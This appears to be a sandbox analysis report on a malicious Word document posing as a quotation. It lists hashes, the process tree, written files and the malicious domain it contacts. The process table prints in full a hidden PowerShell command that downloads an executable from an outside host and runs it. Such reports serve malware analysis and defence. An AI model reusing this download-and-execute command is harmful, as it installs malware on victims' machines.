File name: | Order Kernel_2019_quotation rqt.doc |
Full analysis: | https://app.any.run/tasks/12062cfd-7674-4118-8713-9777a5566725 |
Verdict: | Malicious activity |
Analysis date: | March 14, 2019, 14:18:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Title: ba22b9, Subject: g69d9, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 14 02:40:00 2019, Last Saved Time/Date: Thu Mar 14 02:40:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0 |
MD5: | A9D0B74F8D9304020D3E7340B0944626 |
SHA1: | 26699E47637AD4069F869650F51F0269777B410D |
SHA256: | 010C893E168E832E21371E65979B5F9B4F2C844AE466882519E77C77E273E236 |
SSDEEP: | 768:I3yAtlO83fQfzUnbwBGa32aOlJ8s7HJutv7HJ8kjc:syklO83fQfzUnbYGa3OJ8s7HJA7HJ7c |
.doc | | | Microsoft Word document (38.3) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (29.3) |
.doc | | | Microsoft Word document (old ver.) (22.7) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | ba22b9 |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | - |
Paragraphs: | - |
Lines: | - |
Bytes: | 11000 |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | - |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:03:14 02:40:00 |
CreateDate: | 2019:03:14 02:40:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | g69d9 |
Title: | ba22b9 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3476 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Order Kernel_2019_quotation rqt.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2356 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile $g1a92ee = $env:APPDATA; $o6bef94 = $g1a92ee + '\\j1984c.exe'; If (test-path $o6bef94) {Remove-Item $o6bef94}; $d3ad5 = New-Object System.Net.WebClient; $d3ad5.Headers['User-Agent'] = 'd3ad5'; $d3ad5.DownloadFile('http://jadema.com.py/dr/dr.exe', $o6bef94); Start-Process -Filepath $o6bef94; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2824 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile $g1a92ee = $env:APPDATA; $o6bef94 = $g1a92ee + '\\j1984c.exe'; If (test-path $o6bef94) {Remove-Item $o6bef94}; $d3ad5 = New-Object System.Net.WebClient; $d3ad5.Headers['User-Agent'] = 'd3ad5'; $d3ad5.DownloadFile('http://jadema.com.py/dr/dr.exe', $o6bef94); Start-Process -Filepath $o6bef94; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDCB5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2356 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7MD4O7Y48BV8B24URGVT.temp | — | |
MD5:— | SHA256:— | |||
2824 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IIZ8QI7UH1QPL2YMPT29.temp | — | |
MD5:— | SHA256:— | |||
2356 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0586DB8FF5249AD980CEC7BF2CBC3708 | SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2 | |||
2824 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1b84ec.TMP | binary | |
MD5:0586DB8FF5249AD980CEC7BF2CBC3708 | SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2 | |||
2356 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ae4c4.TMP | binary | |
MD5:0586DB8FF5249AD980CEC7BF2CBC3708 | SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2 | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$der Kernel_2019_quotation rqt.doc | pgc | |
MD5:AA5C825DD0EBEDC2C3917B7A38717A31 | SHA256:FFE0EF42260C6AA7FB6F2E871E3A95CA776C79CACE21EB952DBC0F505ABFFCA1 | |||
2824 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0586DB8FF5249AD980CEC7BF2CBC3708 | SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2 | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:2A891164FE91BA6AC05B0BF649A261EA | SHA256:DBE2D12E45090C02E4A69E55CEC720728F1BD7706358E7ED5CE8E9FC4F94AD32 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2824 | powershell.exe | 192.185.73.158:80 | jadema.com.py | CyrusOne LLC | US | malicious |
2356 | powershell.exe | 192.185.73.158:80 | jadema.com.py | CyrusOne LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
jadema.com.py |
| malicious |